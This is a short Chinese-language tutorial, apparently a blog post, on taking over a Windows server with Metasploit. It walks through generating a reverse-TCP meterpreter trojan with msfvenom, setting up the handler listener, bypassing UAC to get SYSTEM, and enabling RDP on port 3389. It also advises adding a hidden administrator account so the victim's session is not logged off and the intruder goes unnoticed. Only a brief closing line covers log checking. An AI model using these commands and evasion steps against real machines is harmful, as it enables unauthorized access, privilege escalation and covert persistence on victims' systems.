msf开启提权及开启3389端口
背景:
在我们获取windows服务器反弹shell后,是命令行,如何开启远程界面呢?
以下做一下演示:
流程:
1.生成shell木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.128 lport=4444 -f exe>shell.exe
2.设置监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 0.0.0.0 lhost => 0.0.0.0 msf6 exploit(multi/handler) > set lport 4444 lport => 4444 msf6 exploit(multi/handler) > exploit
3.getuid 是普通用户权限 尝试getsystem 失败,利用uac提权
use exploit/windows/local/bypassuac set session 2 exploit
上线后
getuid
getsystem 提权成功
4.执行 post/windows/manage/enable_tcp 开启3389端口
run post/windows/manage/enable_tcp #开启3389端口
5.运行mstsc
这里有个注意点就是,你这边远程登录后,另一边的账户会被注销,这样就会被发现,所有还是自己net user 一个管理员组用户进行远程连接
简单的日志排查
当然你也可以在你的控制面板-系统安全-管理工具-查看时间日志 进行查看日志排查:发现远程ip登录过这个主机